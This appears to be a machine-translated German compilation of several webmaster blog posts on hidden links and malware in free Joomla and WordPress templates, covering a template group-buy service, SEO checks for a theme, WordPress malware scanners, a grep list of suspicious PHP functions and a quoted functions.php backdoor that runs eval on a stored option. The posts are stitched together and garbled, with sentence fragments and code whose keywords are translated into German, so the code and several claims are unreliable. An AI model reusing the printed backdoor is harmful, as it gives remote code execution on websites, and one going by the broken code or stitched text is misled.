Hallo, liebe Leser der Blogseite. Heutzutage gibt es nur noch wenige Webmaster, die ihre Website selbst gestalten (mit reinem Html, ihrer eigenen Engine oder zumindest mit selbst erstellten Vorlagen für das CMS). Im Allgemeinen stimmt das, denn nicht jeder ist in der Lage, etwas Wertvolles zu schaffen – dazu braucht es das Talent eines Designers. Meistens ist es zumindest „nicht sehr gut“, manchmal sogar „einfach schrecklich“.

Aus diesem Grund sind Vorlagen oder Designthemen (in verschiedenen Engines können „Skins“ mit unterschiedlichen Begriffen bezeichnet werden) für beliebte CMS so weit verbreitet. Besonders viel von dieser Güte findet man im Internet für Joomla und WordPress, denn das ist zu Recht so, sowohl im RuNet als auch im bürgerlichen Internet.

Tatsächlich gibt es bereits eine ganze Reihe russischsprachiger Ressourcen mit Katalogen vorgefertigter Vorlagen. Nun, in der Bourgeoisie kann man sie nicht zählen. Alles scheint so wunderbar zu sein – installieren Sie die Engine, finden Sie eine passende Vorlage (es ist kein Geheimnis, dass es nicht so schwer ist, kostenpflichtige Vorlagen kostenlos zu finden), laden Sie sie herunter und genießen Sie das professionelle Design Ihrer neuen Website. Jetzt müssen Sie nur noch wertvolle Inhalte hinzufügen und schon können Sie zusehen, wie die Beliebtheit Ihrer Ressource im Internet wächst.

Aber nicht alles ist so einfach und offensichtlich. Als ich vor langer Zeit einen Artikel schrieb, erhielt ich von Lesern regelmäßig per E-Mail Empfehlungen, diesen oder jenen Dienst aus der Liste zu streichen, denn in den dort geposteten Artikeln In Vorlagen finden sich versteckte Links oder gar Viren. Es stellt sich heraus, dass das Sprichwort nicht lügt - kostenloser Käse passiert nur in einer Mausefalle. Entwickler von kostenlosen Vorlagen (oder diejenigen, die kostenpflichtige „auf Null“ setzen) verdienen auf diese Weise einfach Geld, und dem Umfang nach zu urteilen, sogar eine ganze Menge.

Versteckte Links zu Ressourcen Dritter (und oft von Suchmaschinen auf die schwarze Liste gesetzt) ​​und vor allem Viren können alle Hoffnungen auf Werbung für Ihre Ressource zunichte machen (oder sie ernsthaft untergraben und Ihre Nerven ruinieren). Dafür können Sie entweder. Wie kann man sich bei der Auswahl einer Vorlage vor all dem schützen?

Was ist falsch an kostenlosen Vorlagen für Joomla und WordPress?

Von eigene Erfahrung Ich kann sagen, dass es für einen „Amateur“ sehr schwierig ist, mit einem „Profi“ zu konkurrieren. Ganz am Anfang dieser Veröffentlichung habe ich einen Link zu einem Artikel über Viren bereitgestellt, die die meisten meiner Websites infiziert haben. Dies geschah vor mehr als zwei Jahren, und in dieser Zeit habe ich den epischen Kampf um „Code-Reinheit“ mehr als einmal wiederholt, aber bei einer Reihe infizierter Ressourcen kommt es immer noch mit beneidenswerter Regelmäßigkeit zu Rückfällen (entweder wird Spam von ihnen gesendet oder a Türöffnung entsteht, dann passiert etwas für mich völlig Unverständliches, was zu einer ungeheuer großen Belastung des Hostings führt).

Gleichzeitig verwende ich alle Methoden, die einem „Neuling“ zur Verfügung stehen, um im Code dieser Websites nach Shells und anderen Hintertüren zu suchen, aber ich wiederhole noch einmal, dass ein Amateur einfach nicht mit einem Profi konkurrieren kann. Wenn Sie also denken, dass Sie einen Virus, der sich über eine Vorlage eingeschlichen hat, leicht entfernen können, dann irren Sie sich höchstwahrscheinlich. Das ist eine sehr trostlose, furchtbar lästige Angelegenheit (wenn virale Aktivität trotz aller Bemühungen immer wieder auftritt) und kostet viel Zeit und Mühe.

Das selbe Dies gilt auch für versteckte Links. Es ist gut, wenn Sie auf eine Möglichkeit stoßen, sie aus einer vergangenen Ära einzuführen, in der Sie einfach die Stelle finden konnten, an der Sie sie einfügen und für immer entfernen konnten, um letztendlich eine saubere und kostenlose Vorlage zu erhalten. In den meisten Fällen ist alles viel komplizierter. Um herauszufinden, wo versteckte Links eingefügt werden können, benötigen Sie Software (z. B. das TAC-Plugin), aber diese ist nicht allmächtig, da das Geschäft mit der Verbreitung von Links über kostenlose und kostenpflichtige (gehackte) Vorlagen für Joomla und WordPress sehr gute Einnahmen bringt. Dies ermutigt Menschen, die es praktizieren, nach neuen Lösungen zu suchen, die ihr „Lesezeichen“ weniger auffällig machen.

Tatsächlich kann es heute ziemlich schwierig sein, eine Vorlage für die Generierung von „linken Links“ auch nur schnell zu überprüfen. Sie haben beispielsweise eine Vorlage heruntergeladen, sie auf die Website gestellt, Inhalte hinzugefügt und beschlossen, zu prüfen, ob darin verdächtige (nicht von Ihnen eingegebene) Elemente auftauchen. Externe Links. Sie sind nicht da. Sie sind glücklich, vergessen dieses Problem, sind damit beschäftigt, die Seite zu füllen und zu bewerben, und dann entdecken Sie plötzlich (auf eigene Faust oder nach einem Signal von Suchmaschinen in Form eines Filters oder Verbots), dass es noch versteckte Links gibt und sie führen zu einem solchen „Mist“, von dem Sie selbst nie auf die Idee kommen würden, sich darauf zu beziehen.

Das Beleidigendste daran ist das um den Filter zu entfernen und die Website in den Augen der Suchmaschinen „aufzuhellen“. Es kann sehr lange dauern (in manchen Fällen Monate und sogar Jahre). Der Punkt hier ist jedoch, dass die Entwickler solcher „Lesezeichen“ wissen, dass Sie davon wissen, und die Website nach der Installation der Vorlage auf „allerlei schlimme Auswüchse“ überprüfen. Daher verlangsamen sie den Beginn der Generierung genau dieser Links um einige Zeit, was ihrer Meinung nach ausreicht, damit selbst der misstrauischste Benutzer an die Reinheit der Vorlage glaubt, die er kostenlos erhalten hat.

Darüber hinaus sind versteckte Links jetzt so codiert, dass sie nicht mit den Wörtern md5 oder base64 durchsucht werden (häufig werden sie von einer externen Quelle geladen). Nur eine Reihe von Buchstaben und Sonderzeichen, die beim Durchsuchen aller Vorlagendateien nicht gefunden werden können. Und es können mehr als hundert dieser Dateien sein. Außerdem werden Links nicht sofort angezeigt. Das heißt, es ist für einen Webmaster (den Durchschnitt) tatsächlich unmöglich, sie in der Phase der Erstellung einer Website zu erkennen.

Nun, um eine Infektion durch die Vorlage zu vermeiden, habe ich Ich zahle lieber Geld um sich später nicht mit vielen Problemen herumschlagen zu müssen. Eine andere Sache ist, dass Sie viel Geld bezahlen können, oder Sie können nicht sehr viel bezahlen. Ich persönlich wähle die zweite Option, aber zuerst erkläre ich das Wesentliche der ersten.

Natürlich lässt sich etwas finden und in den offiziellen Repositories dieser Engines(Lesen Sie darüber und besuchen Sie die offizielle Website der Erweiterungen für Joomla), aber erstens ist die Auswahl dort erheblich eingeschränkt, und zweitens werden viele tausend weitere Websites auf der ganzen Welt in die gleichen „Kleider“ gekleidet, was etwas reduziert die Einzigartigkeit Ihres Projekts sowohl in den Augen der Besucher als auch in den Augen der Suchmaschinen.

Es gibt jedoch viele professionelle Unternehmen auf der Welt, die kostenpflichtige Vorlagen für Joomla und WordPress entwickeln. A priori () sollten sie keine Lesezeichen haben, sonst verlieren sie sofort die Autorität und das Vertrauen der Kunden. Der Preis für eine Vorlage kann jedoch je nach Funktionalität und Neuheit zwischen 50 und 100 Dollar liegen.

Darüber hinaus kann es zu Zahlungsproblemen kommen (Sie müssen entweder ein Risiko eingehen und einen Kauf mit direkter Zahlung tätigen). Plastik Karte). Allerdings erhalten Sie als Ergebnis eine bewusst „saubere“ Vorlage, was gut ist. Allerdings ist der damit verbundene technische Support nur dann relevant, wenn Sie die Sprache kennen, in der er bereitgestellt wird. In den meisten Fällen helfen Ihnen Kenntnisse der russischen Sprache dabei nicht weiter.

Die zweite Option gefällt mir aufgrund ihrer höheren Rentabilität (dem Verhältnis von ausgegebenem Geld zu erhaltenen Möglichkeiten) besser, obwohl sie in Bezug auf Entwickler nicht ganz „weiß gewaschen“ ist. Sein Wesen ist Joomla und WordPress unter einer GNU/GPL-Lizenz vertrieben, d.h. Lizenzen kostenlos Software(Solche Software darf genutzt, kopiert, verändert und verbreitet werden). Eigentlich habe ich darüber bereits in dem eingangs erwähnten Artikel über Joomla-Vorlagen geschrieben.

Ohne zu sehr ins Detail zu gehen, ist der Punkt, dass Erweiterungen (Vorlagen, Plugins usw.) für diese Engines nicht das Privateigentum der Autoren sein können. Ja, Sie können dafür ein Entgelt verlangen, es ist jedoch nicht mehr möglich, die unbefugte Nutzung oder Verbreitung dieser Erweiterungen zu bestrafen oder strafrechtlich zu verfolgen. Trotzdem ist der Markt kostenpflichtige Erweiterungen für Joomla und WordPress ist allerdings riesig nicht urheberrechtlich geschützt. Im Gegenteil, die GNU/GPL-Lizenz schützt Sie zu 100 % vor dem Entwickler.

Viele Entwicklungsunternehmen bieten übrigens den Zugriff auf ihre Vorlagen im Abonnement an. Diese. Sie zahlen einen bestimmten Betrag und können für eine bestimmte Zeit alle Kreationen (Vorlagen oder Erweiterungen) herunterladen und dauerhaft weiterverwenden. Eigentlich der zweite Weg sicherer Empfang Themes für WordPress sowie Templates für Joomla basieren in etwa auf dem gleichen Prinzip.

Vor nicht allzu langer Zeit hat mein Freund, den ich in mehreren Artikeln erwähnt habe, „mit dem Finger auf ihn gezeigt“ (er sucht seit mehreren Jahren nach der idealen Option für den Aufbau eines Online-Shops und findet auf diesem Weg viel davon Dinge, die mir interessant erscheinen und in Zukunft aktiv genutzt werden). Wir sprechen über die Bündelung von Premium-Vorlagen und -Erweiterungen CmsHeaven.org .

Der Kern der Spendenaktion ist ganz einfach: Kaufen Sie ein Produkt und verteilen Sie es an alle, die an der Spendenaktion teilgenommen haben. CmsHeaven.org hat das Schema noch weiter vereinfacht – Sie müssen nicht für einzelne Vorlagen oder Erweiterungen bezahlen, die Sie benötigen. Sie zahlen lediglich für den vorübergehenden Zugriff auf den gesamten Katalog, der diesem Dienst zur Verfügung steht (mehrere tausend Titel, aufgeteilt zur einfacheren Suche nach Suchmaschinen, Autoren und Themen).

Jedes der vorgestellten Produkte wurde ehrlich von den Entwicklern mit dem Geld der Einzahler gekauft (es gibt auch kostenlose Vorlagen, aber auch diese werden von bekannten Marken präsentiert, die sie für Werbezwecke benötigen). Und was wichtig ist: Die Organisatoren aktualisieren den Katalog ständig mit neuen Exemplaren (im Eifer des Gefechts, wie sie sagen), die lange auf die Öffentlichkeit warten müssen. Das wird vielen Leuten gefallen.

Im Allgemeinen handelt es sich um eine Genossenschaft, der Sie beitreten und alle Vorteile genießen können. Allerdings mit einigen Einschränkungen. Tatsache ist, dass sich die Organisatoren bewusst sind, dass ihr gesamter Katalog ohne die Einführung von Beschränkungen in Kürze an die Öffentlichkeit gelangen wird. Deshalb findet es statt Beschränkung auf 36 Downloads pro Monat. Dies ist völlig ausreichend für einen normalen Webmaster und sogar für ein Website-Erstellungsunternehmen.

Das garantiert Abwesenheit in den vorgestellten Erweiterungen und Vorlagen „Lesezeichen“(versteckte Links, Viren, Trojaner und Spitzel, die den Entwickler mithilfe ihrer Vorlage über die Website informieren). Aus diesem Grund werden nur Produkte bekannter Marken eingekauft Open Source, wo Sie dies alles überprüfen und gegebenenfalls beseitigen können.

Einige der Erweiterungen wurden ins Russische übersetzt, und wenn bei der Installation oder Konfiguration Probleme auftreten, was oft sehr notwendig ist (Sie haben wahrscheinlich schon mehr als einmal das Internet auf der Suche nach einer Lösung für ein aus heiterem Himmel aufgetretenes Problem durchforstet) . Das ist es übrigens, was kostenlose Engines von kostenpflichtigen Engines unterscheidet, nämlich dass es keinen Benutzersupport als solchen gibt.

Ja, und Sie können die Produkte herunterladen, die Ihnen gefallen normale Geschwindigkeit und ohne Werbung auf File-Hosting-Diensten anzusehen. Es ist eine Kleinigkeit, denn um das begehrte „Süße“ zu bekommen, kann man Berge versetzen und nicht nur mit einem Filehosting-Dienst kämpfen, sondern es sind die Kleinigkeiten, die den Komfort ausmachen.

Im Allgemeinen hat mir die Idee und ihre Umsetzung sehr gut gefallen, aber sollte ich kostenlose Vorlagen aus den Joomla- und WordPress-Repositories verwenden, sollte ich mich bei CmsHeaven.org anmelden oder Vorlagen direkt von den Entwicklern kaufen? das musst du selbst entscheiden. Nur „Ich bitte Sie, essen Sie nachts keine rohen Tomaten“, das heißt, laden Sie keine kostenlosen Produkte von „wunderbaren“ Quellen herunter, da dies zu vielen Problemen führen kann. Brauchst du es?

Viel Erfolg! Bis bald auf den Seiten der Blog-Site

Du könntest interessiert sein

So fügen Sie Besuchszählercode mithilfe des Moduls „Benutzerdefinierter HTML-Code“ oder direkt in eine Vorlage in eine Website ein, auf der Joomla ausgeführt wird
Wie kann man ohne HTML-, CSS- und PHP-Kenntnisse selbst eine professionelle Visitenkarten-Website erstellen? Antwort: MotoCMS!
So erhalten Sie eine adaptive Vorlage für eine zukünftige Website und damit ein intuitives und schnelles CMS
10 tödliche Fehler beim Schreiben und Veröffentlichen von Artikeln
Erstellen eines Menüpunkts in Joomla zum Betreten des Forums und Übertragen der Benutzerregistrierung von SMF auf die Site
JFusion für die Zusammenführung einrichten SMF-Forum und Joomla-Site
JFusion-Module zum Anzeigen von Nachrichten aus dem Forum auf der Website sowie zum Erstellen einer Schaltfläche in SMF, um zu Joomla zurückzukehren WebPoint PRO - responsives Thema für WordPress mit umfassender Funktionalität und kompetenter Technik Suchmaschinenoptimierung
Share42 – Skript zum Hinzufügen von Schaltflächen zur Site soziale Netzwerke und Lesezeichen (es gibt eine schwebende Panel-Option)
Installation des SMF-Forums – Integration von Joomla 1.5 und Simple Machines Forum mithilfe der JFusion-Komponente

Nachdem Sie eine Vorlage zur Installation auf Ihrer WordPress-Site ausgewählt haben, lohnt es sich, deren Layout auf Übereinstimmung mit den Grundregeln der SEO (Optimierung) zu überprüfen. Beispielsweise ist die Boxvorlage „Twenty Fourteen“ so konzipiert, dass die Widget-Titel in Tags angezeigt werden

Extrem schwer fertig zu finden WordPress-Vorlage Ihre Bedürfnisse voll und ganz zu befriedigen. Sehr oft gefällt Ihnen die ausgewählte Vorlage, aber Sie sind mit dem Farbschema nicht zufrieden oder die Position der Seitenleiste, der Kopfzeile, der Schriftart usw. gefällt Ihnen nicht. Die WP-Plattform bietet alle Möglichkeiten, die WordPress-Vorlage an Ihre Bedürfnisse anzupassen.

Lassen Sie uns zum Beispiel eine Box-WordPress-Vorlage namens „Twenty Fourteen“ ändern. Diese Vorlage dient als praktisches Beispiel, an dem Sie nicht nur alle Nuancen von Feinwerk sehen können Feinabstimmung WordPress-Vorlagen.

Vorbereitung zum Bearbeiten der Vorlage

Bevor Sie mit WordPress-Code arbeiten, einschließlich der Änderung der Arbeitsvorlage, müssen Sie Folgendes tun und zur Hand haben:

• (Katalog und Datenbank) ;
• Eine Sicherungskopie der funktionierenden (bearbeitbaren) Vorlage.

Die Vorlage muss zuvor auf der Registerkarte konfiguriert werden Aussehen→Einstellungen.

Notiz: Um dauerhafte Änderungen an der Vorlage vorzunehmen, müssen Sie zu gehen. Wenn Sie ein untergeordnetes WordPress-Theme verwenden, können Sie die Vorlage aktualisieren, ohne dass Ihre Änderungen verloren gehen.

So passen Sie die WordPress-Vorlage „Twenty Fourteen“ individuell an

Ich werde versuchen, das Prinzip des Änderns einer Vorlage zu zeigen, das es Ihnen ermöglicht, Ihre eigenen Änderungen an jeder WordPress-Vorlage vorzunehmen.

Also die Aufgabe: Es gibt eine Vorlage „Twenty Fourteen“, Foto 1. Wir nehmen benutzerdefinierte Änderungen an der Vorlage vor und überprüfen gleichzeitig das Layout der Vorlage, um sicherzustellen, dass die Regeln eingehalten werden SEO-Optimierung.

Notiz: Ich stelle fest, dass die Autoren vieler Vorlagen rekonfigurierbare Einstellungen für ihre Vorlage erstellen und die Einstellungsoberfläche auf einer separaten Registerkarte anzeigen. Wenn Sie mit solchen Vorlagen arbeiten, können Sie ganz einfach benutzerdefinierte Vorlageneinstellungen festlegen, ohne den Vorlagencode zu ändern. Dies ist keine in diesem Artikel beschriebene Option.

Überprüfung des Vorlagenlayouts auf SEO-Regeln

Schauen wir uns zunächst das Layout der Vorlage an. Legen Sie vor der Überprüfung die bereitgestellten Vorlageneinstellungen fest.

Um das Layout auf Einhaltung der SEO-Regeln zu überprüfen, benötigen wir:

• Platzieren Sie ein beliebiges Widget in der/den Seitenleiste(n) der Vorlage. Lass es ein Kalender sein. Wir werden dem Widget auf jeden Fall einen Namen geben.
• Erstellen Sie eine Testseite und einen Test-Site-Beitrag.

Schritte zum Überprüfen des Vorlagenlayouts auf SEO-Regeln

Schritt 1: Überprüfen der Startseite

Wichtig! Auf keiner Seite der Website sollten mehr als zwei h1-Tags vorhanden sein. Ein Öffner

, zweiter Abschluss

, das muss behoben werden. Der Fix ist direkt unten.

Ich wiederhole! Auf keiner Seite der Website sollten mehr als zwei h1-Tags vorhanden sein. Ein Öffner

, zweiter Abschluss

Schritt 2. Testen Sie die Testbeitragsseite

Nach der Hauptseite der Site öffnen wir den Testbeitrag der Site. Hier überprüfen wir, ob nur der Beitragstitel in h1-Tags eingeschlossen ist. Wir führen die Prüfung auf die gleiche Weise durch wie den Site-Beitrag. Nur der Seitentitel sollte mit h1-Tags umschlossen werden.

Schritt 3: Widgets überprüfen

Schauen Sie sich auch die Titel-Tags der Widgets in der Seitenleiste und der Fußzeile an.

Ergebnisse der Layoutprüfung

Als Ergebnis haben wir bei der Überprüfung des Vorlagenlayouts dieser Vorlage festgestellt, dass die Widget-Kopfzeilen in der Fußzeile und in der Seitenleiste der Website in h1-Tags eingeschlossen sind. Dies muss behoben werden.

Wenn wir das finden Startseite Ankündigungen von Artikeln werden in H1-Tags angezeigt, das heißt, auf der Seite der neuesten Beiträge gibt es mehrere Überschriften in H1, wir lesen den Artikel und beseitigen diesen SEO-Layoutfehler.

Das Thema des Artikels erwies sich als umfangreicher als ich erwartet hatte, daher muss ich die WordPress-Vorlage an meine Bedürfnisse anpassen, nämlich ihr Erscheinungsbild ändern, das werden wir im nächsten Artikel tun. Zuerst können Sie die Artikel lesen: Layoutregeln für eine WordPress-Cascading-Style-Datei.

WordPress ist die beliebteste Engine zum Erstellen verschiedener Informationswebsites und Blogs. Die Sicherheit Ihrer Website geht über die Sicherheit Ihrer Daten hinaus. Dies ist viel wichtiger, denn es dient auch der Sicherheit aller Benutzer, die Ihre Ressource lesen und ihnen vertrauen. Aus diesem Grund ist es so wichtig, dass die Website nicht mit Viren oder anderem Schadcode infiziert ist.

Wir werden uns in einem der folgenden Artikel damit befassen, wie Sie WordPress vor Hackerangriffen schützen können, aber jetzt möchte ich Ihnen erklären, wie Sie eine WordPress-Website auf Viren und Schadcode überprüfen, um sicherzustellen, dass alles sicher ist.

Die allererste Option, die mir in den Sinn kommt, ist, dass Sie von Hackern gehackt wurden und ihre Hintertüren in den Code Ihrer Website eingebaut haben, um Spam versenden, Links setzen und andere schlechte Dinge tun zu können. Das kommt manchmal vor, ist aber ein eher seltener Fall, wenn Sie die Software rechtzeitig aktualisieren.

Es gibt Tausende kostenloser WordPress-Themes und verschiedener Plugins, und das könnte bereits eine Bedrohung darstellen. Es ist eine Sache, wenn Sie eine Vorlage von der WordPress-Site herunterladen, und eine ganz andere, wenn Sie sie auf der linken Site finden. Skrupellose Entwickler können verschiedene Schadcodes in ihre Produkte einbetten. Das Risiko ist sogar noch größer, wenn Sie Premium-Vorlagen kostenlos herunterladen, bei denen Hacker, ohne etwas zu riskieren, eine Art Sicherheitslücke hinzufügen können, durch die sie dann eindringen und tun können, was sie brauchen. Aus diesem Grund ist es so wichtig, eine WordPress-Site auf Viren zu überprüfen.

Überprüfen einer WordPress-Site auf Viren

Das erste, worauf Sie bei der Überprüfung einer Website achten müssen, sind keine Viren, sondern WordPress-Plugins. Sie können Ihre Website schnell und einfach scannen und verdächtige Codebereiche finden, die es wert sind, beachtet zu werden, sei es im Theme, Plugin oder im Wodpress-Kern selbst. Schauen wir uns einige der beliebtesten Plugins an:

1. Inhaltsverzeichnis

Dieses sehr einfache Plugin überprüft alle auf Ihrer Website installierten Themes, um festzustellen, ob sie schädlichen Code enthalten. Das Plugin erkennt versteckte Links, die durch Base64-Code-Einfügung verschlüsselt wurden, und zeigt außerdem detaillierte Informationen zu den gefundenen Problemen an. In den meisten Fällen handelt es sich bei den gefundenen Codeteilen nicht um Viren, sie können jedoch potenziell gefährlich sein, weshalb Sie auf sie achten sollten.

Offen "Aussehen" -> „TAC“ Warten Sie dann, bis alle Themen überprüft sind.

2. VIP-Scanner

Sehr ähnlich dem TOC-Scanner für Themen, gibt aber mehr aus genaue Information. Die gleichen Linkerkennungsfunktionen versteckter Code und andere böswillige Einfügungen. Öffnen Sie einfach den VIP-Scanner-Eintrag im Tools-Bereich und analysieren Sie das Ergebnis.

Es kann ausreichen, es zu entfernen zusätzliche Dateien zB desktop.ini. Oder Sie müssen sich genauer ansehen, was in Dateien mit base64 passiert.

3. Anti-Malware von GOTMLS.NET

Mit diesem Plugin können Sie nicht nur die Themes und den Kern der Site auf Viren scannen, sondern die Site auch vor Brute-Force-Passwörtern und verschiedenen XSS- und SQLInj-Angriffen schützen. Die Suche erfolgt auf Basis bekannter Signaturen und Schwachstellen. Einige Schwachstellen können vor Ort behoben werden. Um mit dem Scannen von Dateien zu beginnen, öffnen Sie „Anti-Malvare“ im Seitenmenü und klicken Sie auf „Scan ausführen“:

Bevor Sie einen Scan durchführen können, müssen Sie Ihre Signaturdatenbanken aktualisieren.

4. Wordfence

Dies ist eines der beliebtesten Plugins für WordPress-Sicherheit und Malware-Scanning. Abgesehen vom Scanner, in dem sich die meisten Lesezeichen finden lassen WordPress-Code Es besteht ständiger Schutz vor verschiedenen Arten von Angriffen und Passwort-Brute-Force. Bei der Suche findet das Plugin mögliche Probleme mit verschiedenen Plugins und Themes meldet die Notwendigkeit, WordPress zu aktualisieren.

Öffnen Sie die Registerkarte „WPDefence“ im Seitenmenü und gehen Sie dann auf die Registerkarte "Scan" und drücke "Scan starten":

Das Scannen kann dauern bestimmte Zeit, aber nach Abschluss sehen Sie einen detaillierten Bericht der gefundenen Probleme.

5. AntiVirus

Dies ist ein weiteres einfaches Plugin, das Ihre Website-Vorlage nach bösartigem Code durchsucht. Der Nachteil besteht darin, dass nur die aktuelle Vorlage gescannt wird, die Informationen jedoch ausreichend detailliert angezeigt werden. Sie sehen alle gefährlichen Funktionen, die im Theme enthalten sind, und können dann im Detail analysieren, ob von ihnen eine Gefahr ausgeht. Finden Sie einen Artikel „AntiVirus“ in den Einstellungen und klicken Sie dann auf „Jetzt die Theme-Vorlagen scannen“:

6. Integritätsprüfer

Es empfiehlt sich auch, die Integrität zu überprüfen WordPress-Dateien, falls sich der Virus bereits irgendwo registriert hat. Sie können hierfür das Integrity Checker-Plugin verwenden. Es überprüft alle Kern-, Plugin- und Vorlagendateien auf Änderungen. Am Ende des Scans sehen Sie Informationen zu den geänderten Dateien.

Online Dienste

Es gibt auch mehrere Online-Dienste, mit denen Sie eine WordPress-Site auf Viren überprüfen oder nur die Vorlage überprüfen können. Hier sind einige davon:

themecheck.org- Sie laden das Theme-Archiv herunter und können alle Warnungen zu möglichen schädlichen Funktionen sehen, die darin verwendet werden. Sie können nicht nur Informationen zu Ihrem Thema anzeigen, sondern auch zu anderen von anderen Benutzern hochgeladenen Themen verschiedene Versionen Themen. Was auch immer die Plugins finden, finden Sie auf dieser Website. Die Überprüfung Ihres WordPress-Themes ist ebenfalls sehr wichtig.

virustotal.com– eine bekannte Ressource, mit der Sie Ihre Website oder Vorlagendatei auf Viren überprüfen können.

ReScan.pro - WordPress-Check Die Verwendung dieses Dienstes auf einer Website auf Viren ist kostenlos. Es werden statische und dynamische Analysen durchgeführt, um mögliche Weiterleitungen zu erkennen. Der Scanner öffnet die Seiten der Website. Prüft die Website anhand verschiedener Blacklists.

sitecheck.sucuri.net- ein einfacher Dienst zum Scannen von Websites und Themen auf Viren. Es gibt ein Plugin für WordPress. Erkennt gefährliche Links und Skripte.

Manuelle Prüfung

Nichts kann besser sein als die manuelle Überprüfung. Linux verfügt über dieses wunderbare grep-Dienstprogramm, mit dem Sie nach Vorkommen beliebiger Zeichenfolgen in einem Ordner mit Dateien suchen können. Es bleibt abzuwarten, wonach wir suchen werden:

eval – Mit dieser Funktion können Sie beliebigen PHP-Code ausführen. Sie wird von Produkten mit Selbstachtung nicht verwendet. Wenn eines der Plugins oder ein Theme diese Funktion verwendet, besteht eine fast 100-prozentige Wahrscheinlichkeit, dass es einen Virus enthält.

• base64_decode- Verschlüsselungsfunktionen können in Verbindung mit eval verwendet werden, um bösartigen Code zu verbergen, sie können aber auch für friedliche Zwecke verwendet werden, seien Sie also vorsichtig;
• sha1- eine andere Methode zur Verschlüsselung von Schadcode;
• gzinflate- Komprimierungsfunktion, gleiche Ziele, zusammen mit eval, zum Beispiel gzinflate(base64_decode(code);
• strrev- dreht die Zeile nicht um, bevor sie als Option zur primitiven Verschlüsselung verwendet werden kann;
• drucken- gibt Informationen an den Browser aus, zusammen mit gzinflate oder base64_decode ist es gefährlich;
• file_put_contents- WordPress selbst oder Plugins können immer noch Dateien im Dateisystem erstellen, aber wenn das Theme dies tut, sollten Sie vorsichtig sein und prüfen, warum es das tut, da Viren installiert werden können;
• file_get_contents– wird in den meisten Fällen zu friedlichen Zwecken verwendet, kann aber zum Herunterladen von Schadcode oder zum Lesen von Informationen aus Dateien verwendet werden;
• Locken- die selbe Geschichte;
• fopen- öffnet eine Datei zum Schreiben, man weiß nie zu welchem ​​Zweck;
• System- Die Funktion führt den Befehl aus Linux-System Wenn ein Theme, ein Plugin oder WordPress selbst dies tut, liegt höchstwahrscheinlich ein Virus vor;
• Symlink- Erstellt symbolische Links im System, möglicherweise versucht der Virus, den Hauptlink herzustellen Dateisystem von außen zugänglich;
• Kopieren- kopiert eine Datei von einem Ort an einen anderen;
• getcwd- gibt den Namen des aktuellen Arbeitsverzeichnisses zurück;
• cwd- ändert den aktuellen Arbeitsordner;
• ini_get- erhält Informationen über PHP-Einstellungen, oft zu friedlichen Zwecken, aber man weiß nie;
• error_reporting(0)- deaktiviert die Ausgabe etwaiger Fehlermeldungen;
• window.top.location.href - Javascript-Funktion, wird für Weiterleitungen zu anderen Seiten verwendet;
• gehackt- Also, nur für den Fall, wir überprüfen, plötzlich beschloss der Hacker selbst, es uns zu sagen.

Sie können jedes einzelne Wort wie folgt in einen Befehl einsetzen:

grep -R „gehackt“ /var/www/path/to/files/wordpress/wp-content/

Oder verwenden Sie ein einfaches Skript, das nach allen Wörtern auf einmal sucht:

Werte="base64_decode(
eval(base64_decode
gzinflate(base64_decode(
getcwd();
strrev(
chr(ord(
cwd
ini_get
window.top.location.href
Kopieren(
auswerten(
System(
Symlink(
error_reporting(0)
drucken
file_get_contents(
file_put_contents(
fopen(
gehackt“

cd /var/www/path/to/files/wordpress/wp-content/
$ fgrep -nr --include \*.php "$values" *

Hallo Freunde. Sind Sie sicher, dass die kostenlose WordPress-Vorlage, die Sie für Ihre Websites und Blogs verwenden, wirklich sicher ist und keine versteckten Bedrohungen oder bösartigen Code enthält? Bist du dir da völlig sicher? Absolut?)

Sie denken, Sie haben die Vorlage durchlaufen, versteckte Links daraus entfernt und die Arbeit ist erledigt. Sie scannen die Dateien der Website regelmäßig mit einem Antivirenprogramm, werfen einen Blick in die Yandex-Webmaster-Tools auf der Registerkarte „Sicherheit“ und sind erleichtert, die Meldung dort zu sehen: „ Auf der Website wurde kein Schadcode entdeckt«.

Das habe ich mir auch gedacht. Ich möchte dich nicht verärgern, aber...

Versteckter gefährlicher Code in kostenlosen WordPress-Vorlagen

Dies ist der Brief, den ich letzte Woche per E-Mail von meinem Hosting-Unternehmen erhalten habe. Vor kurzem haben sie eine regelmäßige Überprüfung aller Website-Dateien auf schädliche Inhalte eingeführt, und sie haben diese Inhalte tatsächlich bei mir gefunden!

Alles begann, als ich eines Nachmittags meine Website besuchte und sie nicht starten konnte – eine beleidigende Meldung erschien, dass Dateien mit der PHP-Erweiterung nicht gefunden wurden. Nachdem ich mich ein wenig angespannt hatte, untersuchte ich den Inhalt des Ordners mit der Site auf dem Hosting und entdeckte sofort ein Problem: Meine Vorlagendatei fuctions.php wurde in „functions.php.malware“ umbenannt, was mehrdeutig darauf hinzudeuten schien, dass es sich um ein Antivirenprogramm handelte Ich arbeite hier oder so ähnlich.) Nachdem ich zur Post gegangen war, fand ich den obigen Bericht des Hosters.

Das erste, was ich tat, war natürlich, nachzuschauen Diese Datei, studierte den Inhalt, scannte mit allen möglichen Antivirenprogrammen, Dutzenden online Dienste zur Überprüfung auf Viren etc. — Am Ende wurde nichts gefunden, alle waren sich einig, dass die Datei völlig sicher sei. Natürlich habe ich dem Hoster gegenüber meine Zweifel geäußert und gesagt, dass Sie etwas vermasselt hätten, aber für alle Fälle habe ich ihn gebeten, einen Bericht über die Entdeckung eines bösartigen Codestücks vorzulegen.

Und das haben sie mir geantwortet

Ich habe bei Google nach Informationen zu diesem Code gesucht und ernsthaft darüber nachgedacht ...

So finden Sie einen Schadcode in einer Vorlage

Wie sich herausstellt, handelt es sich hierbei um eine wirklich nicht triviale Technik, die es interessierten Parteien ermöglicht, ohne Ihr Wissen Daten an Ihre Website zu übermitteln und den Inhalt von Seiten zu ändern! Wenn Sie eine kostenlose Vorlage verwenden, dann Ich empfehle dringend, die Datei „functions.php“ auf den folgenden Code zu überprüfen:

add_filter('the_content', '_bloginfo', 10001);
Funktion _bloginfo($content)(
globaler $post;
if(is_single() && ($co=@eval(get_option(‘blogoption’))) !== false)(
return $co;
) sonst return $content;
}

Selbst mit meinen sehr oberflächlichen PHP-Kenntnissen ist es klar, dass ein bestimmter Filter erstellt wird, der an die globalen Variablen „post“ und „content“ gebunden ist, die dafür verantwortlich sind, Inhalte nur auf Blog-Post-Seiten anzuzeigen (die is_single-Bedingung). Schon verdächtig, nicht wahr? Nun wollen wir sehen, was es ausgeben wird. diesen Code auf unserer Website.

